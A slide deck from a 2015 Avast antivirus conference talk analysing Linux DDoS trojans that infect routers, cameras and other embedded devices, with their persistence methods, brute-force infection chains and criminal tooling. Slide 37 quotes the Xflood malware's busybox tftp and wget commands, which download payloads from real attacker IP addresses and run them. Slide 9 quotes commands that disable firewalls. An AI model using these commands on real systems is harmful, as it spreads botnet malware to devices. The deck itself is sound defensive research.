Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

avar2015_ddos_trojans_slides

448 views

Published on

  • Be the first to comment

avar2015_ddos_trojans_slides

  1. 1. www.avast.comwww.avast.com Peter Kálnai Jaromír Hořejší DDoS Trojans: When embedded devices flood AVAR 2015, Da Nang, Vietnam
  2. 2. Outline • History and evolution of the threat • Common characteristics of malware • Autostart (Persistence) • Infection chain – Methods of intrusion • Cybercriminals’ operation tools – Bot builders and C&C panels – HFS listings – Brute-forcers – Vulnerability & Port scanners • DDoS Trojans (Tsunami-like; Gafgyt; Powbot; MrBlack; Xorddos, Xflood; ChinaZ) • Summary
  3. 3. History • (Čeleda et al., MU, Brno) “Embedded malware - an analysis of the Chuck Norris botnet”, December 2009 (ELF:PsyBot) • Internet Census of 2012: “Port scanning /0 using insecure embedded devices” (Carna botnet) • (Dr. Web) “DDoS Trojans attack Linux”, May 2014, (ELF:MrBlack) • (Kaspersky) “Shellshock and its early adopters”, September 2014, (ELF:Gafgyt) • (Symantec) “Linux.Powbot”, September 2014 (ELF:Powbot) • Virustotal added “File detail” tab with parsed ELF characteristics, December 2014 •
  4. 4. History • (WooYun.org) “ 海康威视等监控和物联网设备被用于僵尸网 络的实例” (~”Examples of Hikvision surveillance and networking devices used as botnets”), December 2014 (ELF:Xflood) • (Krebs on Security) “Lizard Stresser Runs on Hacked Home Routers”, January 2015 (ELF:Gafgyt) • (Yin Minn Pa Pa et al.) “IoTPOT: Analysing the Rise of IoT Compromises”, August 2015 (ELF:Gafgyt; ELF:Powbot; ELF:Xflood;) • (Avast) “DDoS trojans: A malicious concept that conquered the ELF format”, Virus Bulletin, September 2015 • (Incapsula) “CCTV Botnet In Our Own Back Yard”, October 2015
  5. 5. ELF IoT Malware space • Visualization using Gephi (Force Atlas 2) – Nodes: malware families determined by signatures; size dependent – Edges: connect nodes if they share a signature • Clustered ~3500 samples with e_machine parameter EM_ARM, EM_MIPS, EM_SH, EM_SPARC, EM_PPC ( November 2015; total number ~20000 of ELF malware excluding Android’s PUAs ) • Coloured in 4 categories (General-purpose trojans; DDoS trojans; Viruses;; Unclassified) • Excluded samples of little or no interest: – Truncated files – Components of Android packages – EM_386 and EM_x86_64
  6. 6. Common ELF characteristics • The ELF header – e_type: executable file or shared object – e_machine with prefix “EM_” followed by 386, x86_64, ARM, MIPS, SH, PPC, SPARC or M68K • Segments – Described by program headers – Segments contain one or more sections • Sections – Names (.bss, .init, .got, .plt, .rel, .rodata, .strtab, .symtab, .text) – Special types (SYMTAB, STRTAB) contain also imported and exported symbols; affected by the process of stripping  harder reverse engineering – .rodata usually contains character strings
  7. 7. Common ELF characteristics • Static properties: – Trojanized flooding tools – Significant portion of code shared among all the variants – Written mostly in C/C++ – Debug info often not stripped – Variety of supported flooding methods • UDP, TCP/SYN, ICMP, DNS, DNS amplification – Killing competing resource consuming processes – In plain form or packed with UPX • UPX sometimes modified to avoid unpacking by the original UPX tool (modified magic value, checksums do not match)
  8. 8. Autostart / Persistence • In a strict sence DDoS trojan is a DDoS tool with an autostart • Methods of autostart / persistence found in-the-wild: – (A1) /etc/init.d/ • startup scripts copied here – (A2) /etc/cron.<S> • <S> from { hourly, daily, weekly, monthly } • A service can be added to /etc/crontab – (A3) /etc/rc<N>.d/ • Symbolic links to startup scripts • <N> is a runlevel indicator (Halt 0; Single-user 1; Multi-user 2-5; Reboot 6) • Alternatively, path can be added to /etc/rc.local
  9. 9. Self-protection features • Disabling firewalls – SuSEfirewall2 stop; – reSuSEfirewall2 stop; • Modifying iptables policies – iptables -D INPUT -p tcp --dport 23 -j DROP – Drops packets on port 23 – Prevents remote connection to compromised computer
  10. 10. Infection chain • Attackers – build ELF malware using a customized builder – start Http File Server (HFS), which will be hosting the previously built malicious binaries – run port scanners on IP ranges
  11. 11. Infection chain • If a desired port opened – Shellshock vulnerabilities (Bossabot) – PHP vulnerabilities like CVE-2012-1823 (Zollard, Bossabot)
  12. 12. Infection chain • If a desired port opened – SSH/Telnet brute force attack • Lists of user names and passwords • Runs from Windows or Linux machines, targets Linux devices • Telnet default password lists
  13. 13. Infection chain • Data files acquired from HFS listings – Lists of target IPs – Password lists – Result of a port scan (wineggdrop) as found in an archive on a compromised machine – About 2M IPs scanned and 14K hosts with open port 22 found
  14. 14. Infection chain • Data files acquired from HFS listings – Lists of vulnerable devices, e.g. routers with default credentials
  15. 15. Cybercriminals’ operation tools • Bot builders
  16. 16. Cybercriminals’ operation tools • C&C panels (for ELF:MrBlack)
  17. 17. Cybercriminals’ operation tools • HTTP File Server (HFS) listings – Count of downloads related to the number of infected machines and the size of botnet
  18. 18. Cybercriminals’ operation tools • Vulnerability scanners & exploits – Shellshock Scanner
  19. 19. Cybercriminals’ operation tools • SSH brute-forcers – linux%d.exe • scans all IPs for open port 22, • tries passwords from passwd%02d.txt • outputs lx_pass.txt – Leaked online
  20. 20. Cybercriminals’ operation tools • SSH uploader – ssh.exe (python script, compiled with py2exe) • reads lx_pass.txt, • connects to each host and • executes there commands from command.txt file
  21. 21. Cybercriminals’ operation tools • Port scanners – ScanPort – WinEggDrop
  22. 22. DDoS Trojans: Gafgyt • Detection name for Lizzard Stresser DDoS Tool • Character strings: – “/bin/busybox;echo -e 'gayfgt‘”, “BOGOMIPS”, “echo -e 'x67x61x79x66x67x74‘” • Source code leaked in January 2015; available both client and server side • Intrusion via – Brute-forcing telnet – Shellshock vulnerabilities • IRC bot with implemented client commands: – PING, GETLOCALIP, SCANNER, TCP, UDP, DNS, KILLATTK, LOLNOGTFO • Threat No. 1 for embedded devices: – EM_386, EM_x86_64, EM_SPARC, EM_PPC, EM_SH, EM_ARM, EM_MIPS and EM_68K
  23. 23. DDoS Trojans: Gafgyt • Tutorials and installation / compilation scripts available on hacking forums
  24. 24. DDoS Trojans: Gafgyt • Recommended VPS hostings • Scripts to download cross compilers • Scripts compile for several architectures • Scripts to download and install on the victim device • Configuration of UnrealIRCd • Scripts and tools for SSH brute-forcing
  25. 25. DDoS Trojans: Gafgyt • Auto cross compiler
  26. 26. DDoS Trojans: Tsunami • Source code available under name kaiten.c • IRC bot • Well documented, control commands explained
  27. 27. DDoS Trojans: Tsunami • Popular, often found botnets with thousands of bots • UnrealIRCd with almost 5K clients
  28. 28. DDoS Trojans: Aidra • IRC bot, sources available • Tutorials on hack forums
  29. 29. DDoS Trojans: Aidra
  30. 30. DDoS Trojans: Powbot • Spread via Shellshock & Telnet brute-forcing • Variants: EM_ARM, EM_MIPS, (EM_386) • Character strings (usually encrypted with a XOR key 0x0E): – “wopbot has started”, “%s?XXXXXXXX”, “!+[]+!![]+!![]+!![]+!![]+!![]”, “YESHELLO”, “killattk” • Supported commands: – kill, udp, syn, dildos (tcp flood), http, mineloris • Ability to bypass Cloudflare anti-DDoS JS challenge – Javascript code generates an answer – The answer sent to server – Server validates a response (If successful, cf_clearance cookie set and redirected to the initially requested resource)
  31. 31. DDoS Trojans: Powbot Bypassing Cloudflare
  32. 32. DDoS Trojans: MrBlack • Tool with source code available • Trojanized extensions dubbed Aesddos and WrkAtk with the autostart feature • Contains various character strings: – VERS0NEX, Mr.Black, Hacker, MainSocket, DealWithDDoS • List of attack supporting procedures – DNS_Flood, SYN_Flood, UDP_Flood, UDPS_Flood, TCP_Flood, CC_Flood, CC2_Flood, CC3_Flood, etc… • Executables for Linux operating systems available for architectures: – EM_x86_64, EM_386, EM_MIPS, EM_ARM • Control panel named “Sword Linux” (shown earlier)
  33. 33. DDoS Trojans: Xorddos • Intel variants via SSH brute-forcing; the ARM variant not observed in-the-wild yet • Installation script – gets kernel version, – (optional) uploads kernel header, – downloads a customized trojan binary with embedded LKM • LKM based on an open-source rootkit called Suterusu, available on Github • Heavy autostart features – Repeated self-installation under random name in /boot and executed; to avoid termination via kill command • C&C communication encrypted in both directions with hard- coded XOR key (BB2FA36AAA9541F0)
  34. 34. DDoS Trojans: Xorddos • Configuration file (Elimination of rivals) – Options: • md5, denyip, filename, rmfile – List of competing processes and files • Red = Elknot / Setag • Violet = Sotdas • Green = Elknot • Blue = MrBlack
  35. 35. DDoS Trojans: Xorddos • Control panel – Controls two infected devices (EM_386, EM_ARM)
  36. 36. DDoS Trojans: Xflood • Reported on a Chinese blog in December 2014 • Spread via Telnet brute-forcing • Examples of character strings: – “0916.davinci”, “create daemon process failed.”, “TcpCatFace”, “WebSpiderCC”, “[VERB] SS5 exiting.” (Socks Server 5) • Supported flooding methods: – SYNFLOOD, ICMPFLOOD, UDPFLOOD, TCPFLOOD, – ACKFLOOD, IGMPFLOOD, UDPSMALLFLOOD, – TCPMULTICONNECT, SUPERSYN, DNSCIRCUIT, TCPCATFACE, – WEBCC_MSG_GETFULL, WEBCC_MSG_INFINITUDE, WEBCC_MSG_SPIDER, WEBCC_MSG_DOWNFILE, WEBCC_MSG_CATFACEWEB
  37. 37. DDoS Trojans: Xflood • Installation script – Kills processes with the same name – Uses busybox commands • busybox tftp -r mips -g 93.174.93.52; cp /bin/busybox ./; cat mips > busybox; rm mips; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx – Download script selects payload depending on a device: echo $?K_O_S_T_Y_P_E cd ..;cd var;busybox tftp -g -r 1.sh 121.199.10.66;chmod 777… cd /home;busybox ftpget -u 886 -p 886 61.147.107.94 0923.davinci 0923.davinci;chmod 777… cd /mnt;busybox tftp -g -r /s/0923.8196 123.56.86.13;chmod 777… busybox wget http://211.155.226.20:8080/socket5_davinci;chmod 777… busybox t1ftp -g -r socket5_rdlink 121.199.10.66;chmod 777…
  38. 38. DDoS Trojans: Xflood • Targeted chipsets, by parsing /proc/cpuinfo • RTL8196C (Realtek, MIPS) – Wireless AP/Routers • DaVinci (Texas Instruments; LE ARM) – DaVinci Video/Vision Processors • Ralink (MIPS) – routers • AR5315 (Ateros; MIPS) – routers • Faraday (Faraday Technologies; ARM) – DVRs, IP cameras
  39. 39. DDoS Trojans: ChinaZ • Source code of a core features available on Github (a project DDoSClient) • Character strings: – “CSocketManager::StartDDosTask”, “Sending Packet...”, “LOGIN_FREE: %s%s@%s@%s@%s@%s” • Volumetric attacks – SYN, UDP, ICMP, DNS • Multiple platforms – EM_386, EM_x86_64, EM_MIPS, EM_ARM • Samples often compressed with UPX • Instruction videos leaked on Chinese forums – Web control panel – Control panel with Windows GUI
  40. 40. DDoS Trojans: ChinaZ • C&C panel
  41. 41. Summary • DDoS Trojans: threat No 1. for servers and embedded systems running Linux • Variety of projects available on code sharing sites or forums • Autostart is a desired and advanced feature • Similar attack methods implemented • Little attempts to cover the functionality by stripping or by (modified) UPX • Increased detection rates by AV solutions  distributors of malware careless about detecting yet • Targets are both small/medium business and services hosted by large CDNs
  42. 42. Acknowledgement • Information and data exchange: – @benkow_ (& @malwaremustdie) – Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow (Yokohama National University, Japan; National Institute of Information and Communications Technology, Japan; Saarland University, Germany)
  43. 43. Questions & answers

×